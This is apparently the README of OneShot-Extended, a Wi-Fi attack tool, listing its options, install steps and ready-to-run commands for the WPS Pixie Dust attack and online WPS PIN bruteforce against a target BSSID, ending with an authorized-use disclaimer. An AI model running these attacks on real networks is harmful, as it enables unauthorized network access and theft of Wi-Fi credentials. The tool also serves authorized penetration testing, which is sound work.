OneShot-Extended performs the Pixie Dust attack without special card or monitor mode.
- Pixie Dust attack
- Offline WPS PIN generating algorithm
- Online WPS bruteforce
- Wi-Fi scanner with highlighting based on iw;
- Ability to save upon success
- Python 3.6 and above
- WPA Supplicant
- Pixiewps
- iw
Required arguments:
-i, --interface=<wlan0> : Name of the interface to use
Optional arguments:
-b, --bssid=<mac> : BSSID of the target AP
-p, --pin=<wps pin> : Use the specified pin (arbitrary string or 4/8 digit pin)
-K, --pixie-dust : Run Pixie Dust attack
-B, --bruteforce : Run online bruteforce attack
--push-button-connect : Run WPS push button connection
Advanced arguments:
-d, --delay=<n> : Set the delay between pin attempts [0]
-w, --write : Write AP credentials to the file on success
-s, --save : Save the AP to network manager on success
-F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
-X, --show-pixie-cmd : Always print Pixiewps command
--vuln-list=<filename> : Use custom file with vulnerable devices list ['vulnwsc.txt']
--iface-down : Down network interface when the work is finished
-l, --loop : Run in a loop
-r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
--mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
(for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
-v, --verbose : Verbose output
Please note that root access is required.
Installing requirements
pkg install -y root-repo
pkg install -y git tsu python wpa-supplicant pixiewps iw opensslGetting OneShot
cd ~
git clone --depth 1 https://github.com/chickendrop89/OneShot-Extended OneShotRunning
sudo python OneShot/oneshot.py -i wlan0Install these packages through your distro's package manager:
python3 wpa-supplicant iw wget pixiewpsGetting OneShot
cd ~
git clone https://github.com/chickendrop89/OneShot-Extended OneShotRunning
sudo python OneShot/oneshot.py -i wlan0Start Pixie Dust attack on a specified BSSID:
sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -KShow avaliable networks and start Pixie Dust attack on a specified network:
sudo python3 oneshot.py -i wlan0 -KLaunch online WPS bruteforce with the specified first half of the PIN:
sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234Start WPS push button connection:s
sudo python3 oneshot.py -i wlan0 --pbc"RTNETLINK answers: Operation not possible due to RF-kill" Just run:
sudo rfkill unblock wifi
"Device or resource busy (-16)"
- Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running OneShot with
--iface-downargument.
The wlan0 interface disappears when Wi-Fi is disabled on Android devices with MediaTek SoC
- Try running OneShot with the
--mtk-wififlag to initialize Wi-Fi device driver.
kimocoder, drygdryg, chickendrop89for extended implementationrofl0rfor initial implementation;Monohromfor testing, help in catching bugs, some ideas;Wiirefor developing Pixiewps.
Warning
This tool is intended for educational and authorized penetration testing purposes only. It is not designed for, and must not be used for, illegal activities such as hacking, unauthorized access, or causing damage to systems or networks. By using this tool, you agree to use it responsibly and ethically, and to comply with all applicable laws and regulations. The developer assumes no responsibility for any misuse of this tool.